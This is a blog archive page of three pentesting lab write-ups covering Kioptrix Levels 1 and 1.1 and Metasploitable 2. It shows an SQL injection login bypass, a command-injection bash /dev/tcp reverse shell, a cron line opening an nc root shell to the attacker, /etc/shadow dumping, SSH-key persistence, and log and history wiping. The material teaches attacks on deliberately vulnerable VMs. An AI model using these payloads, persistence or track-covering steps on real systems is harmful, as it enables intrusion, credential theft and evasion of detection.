Archives

Categories

Meta

Month: February 2017

Kioptrix: Level 1.1 (#2) is the second VM of the Kioptrix series which can be found here. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification.

Description from the author:“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.”

Lets get started!

Kali Linux machine

192.168.182.147

Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.152

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning

Using nmap you can see the server is running OpenSSH 3.9p1 on port 22/tcp, Apache httpd 2.0.52 on port 80/tcp, Apache httpd 2.0.52 on port 443/tcp, CUPS 1.1 on port 631/tcp, and MySQL on port 3306/tcp. It’s probable that this web server has a back-end database running SQL on it ,which might be vulnerable to an SQL injection.

Exploitation (SQL and Command Injection)

Browsing to the server, I found that it displays a login page. Next, I will try to perform and SQL Injection.

I tested the login form using ‘ or ‘1’=’1 and it worked.

The reason why it probably worked was because the SQL statement is along the lines of this:

SELECT * FROM users WHERE username='$username' AND password='$password'

Supplying the username and password with ‘ or ‘1’=’1 will turn the SQL statement into:

SELECT username FROM users WHERE username='' or '1'='1' AND password='' or '1'='1'

Because ‘ or ‘1’=’1 always means true, this SELECT statement will log us in and return the first username for the user table.

So now we have a Ping command prompt which might be vulnerable to a Command Injection. Using the command ; id I found that the application was vulnerable to a command injection, so I also tried to see if I could get the usernames and passwords on the server. I was able to get the /etc/passwd file but didnt have access to /etc/shadow .

Knowing that the application is vulnerable to a command injection, I took it a step further and tried to get a reverse shell.
Used ncat to set up the listener to catch the reverse shell.

root@kali:~# nc -nvlp 443

Then went back to the console on the website and ran the following command to get the reverse shell:

; bash -i >& /dev/tcp/192.168.182.147/443 0>&1

I successfully got a reverse shell and as apache. I will next try to do privilege escalation to get the desired root account.

Kioptrix Level 1 is the first in the series of five. Point of the game is to get a root shell of the vulnerable machine. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. More info that comes from the author will be listed below with the link to download the VM here.

Description from the author:“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.”

Without further ado, lets get started.

Kali Linux machine

192.168.182.147

Reconnaissance

Using the tool netdiscover I was able to find out our victim with the ip address of 192.168.182.151

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning and enumeration

I used nmap to scan the victim and found it was running OpenSSH 2.9p2 on port 22, Apache httpd 1.3.20 on ports 80 and 443, samba smbd on port 139, and rpcbind on port 111.

Did a simple smb enumeration using enum4linux tool and found out the victim is running Samba 2.2.1a, which is vulnerable to Samba trans2open Overflow. The exploit can be located here.

root@kali:~# enum4linux -a 192.168.182.151

Exploitation

Samba TRANS2_OPEN Buffer Overflow

A description of this vulnerability is listed below, which is from rapid7’s Vulnerability & Exploit Database.With that, I used the metasploit module exploit/linux/samba/trans2open to exploit this vulnerability.

Description- Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.

Conclusion

After getting root shell I found the flag in /var/spool/mail which said :“If you are reading this, you got root. Congratulations.
Level 2 won’t be as easy…”.
Well it that’s it for level 1. It will only get harder from here. Next is Level 2.

Metasploitable is a virtual machine that was intended to be vulnerable so you could test out some penetration tools and perform some common penetration techniques on it. What I will do is go through the 5 phases of a pentration test(except reconnaissance) and talk about some of the tools and type of exploits I used. Granted Metasploitable 2 has many other vulnerabilities, but I will only cover a few which will give you a good start on exploiting Metasploitable 2. Below are the IP addresses of my Kali and Metasploitable virtual machines.

Kali Linux Machine

192.168.182.147

Metasploitable 2

192.168.182.150

Scanning and Enumeration

Scanning with nmap

Using nmap to do a version scan with OS detection shows the services and versions each service is running. According to nman the OS is running Linux 2.6.X as well.

Banner grabbing port web server

Using netcat we found that the victim is running Apache httpd 2.2.8 ((Ubuntu) DAV/2). I also found out that getting on my web browser and connecting to http://192.168.182.150 I was able to find services like Damn Vulnerable Web App, Multillidae, phphMyAdmin, Wiki, and WebDAV, running on the victim machine as well as the username msfadmin and password msfadmin credentials to log in.

VNC on port 5900

On the nmap scan I saw that the victim was running VNC (protocol 3.3). I tried connecting to it but it requires a password to get it. I will brute-force my way in later in this pentest.

Exploitation

VSFTPD v2.3.4 Backdoor (Port 21)

According to nmap Metasploitable is running VSFTPD v2.3.4., which in 2011 this backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011. This backdoor was removed on July 3rd 2011. We are going to check to see if this server contains the backdoor. Enter any username you like and add “:)” at the end. You can use anything for the password. If the backdoor is there, then it will trigger without valid credentials. The login will hang after the password, which tells us that the FTP server is still processing the login attempt. If we use Netcat and connect to port 6200 we will get a root shell, which indicates the backdoor is present. Could also Metasploit framework for this exploit as well, located Here.

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

What I did was use metasploit and load the module “exploit/multi/misc/java_rmi_server” and set the options up to run the exploit. What’s a bit different here is I set the payload to java/meterpreter/reverse_tcp before running the exploit.

NFS Share misconfiguration (Port 2049)

NFS(Network File Share) is a service, in Unix, used to share resources across the network, however system admistrators need to pay attention because misconfiguring it could present a vulnerability like the one shown here. During the nmap scan it was shown that NFS was running on port 2049. Using the command showmount -e 192.168.182.150, I was able to discover that the root directory was being shared!! As you know, for sure I was going to exploit this vulnerability listed below.

Making a mount point in order to get view all the contents of the server. I also run the df -h command in order to show that we have access to the root directory of the server. In the post exploitation phase I will add a ssh key on the server’s authorized_keys file. More will be explained later in this guide.

Bruteforcing Vncviewer Login Credentials (Port 5900)

Usinging Metasploit’s auxiliary module “auxiliary/scanner/vnc/vnc_login” I used it to brute-force the victim and get the password “password”. With this I was able to go back run vncviewer again with the correct credentials and not only get a GUI but also root shell into the system!

UnrealIRCD 3.2.8.1 Backdoor Command Execution (Port 6667)

This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010. Lets use the Metasploit Framework with exploit/unix/irc/unreal_ircd_3281_backdoor module to exploit this backdoor.

Post Exploitation

Getting the usernames and passwords from the Victim

When you have a reverse shell, you could use the cat command to show what the contents in the /etc/shadow file. This displays the hashes to the passwords to the usernames. With further investigation, you can tell that these are MD5(Unix) passwords.

Enable a Cron Job to run every 5 minutes

Using the command below we can run a cron job to run every 5 minutes which would run Netcat to return us a root shell. Open /etc/crontab on the linux victim and pasting the line below to the end of the file. Exit and save the file and restart the cron service by entering service cron restart. Now all you have to do is set up a Netcat listener on your kali machine to pick up the shell.

*/5 * * * * root nc 192.168.182.147 12345 -e /bin/bash

This will setup the listener to grab the shell

nc -lvp 12345

Adding a SSH key on the Server for future use

Since we have access to the servers SSH keys, I will be generating my own ssh key using ssh-keygen and append it to Metasploitable’s authorized_keys file using thecat ~/.ssh/id_rsa.pub >> /temp/root_access2Metaploitable/root/.ssh/authorized_keys command.

We now have successfully authenticated to the server with the user root without needing a password. I could come back to this anytime now without password authentication.

root@kali:~# ssh root@192.168.182.150
Last login: Sat Feb 4 15:56:27 2017 from 192.168.182.147
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~# hostname
metasploitable
root@metasploitable:~#

Covering Tracks

Clear Event Logs

Either using kwrite, edit, vi, etc, open the file /var/log/messages. From there you can delete any entries related to when you compromised the system or delete all the entries if you like.

Clearing terminal history

You can clear your current session’s bash history using the command history -c

You can also remove .bash_history file on the victim’s machine to remove all the history as well.

rm ~/.bash_history

Conclusion

Metasploitable provides us with common vulnerabilities and gives us a VM in which we can test some penetration techniques, however this is just a start to those interested in learning a bit about penetration testing. Later on I will exploit other vulnerable VMs located in Vulnhub andPentester Labs .

Note– I will continue to add more this guide with time. If you have any comments, questions, or any other topics you would want me to cover, let me know.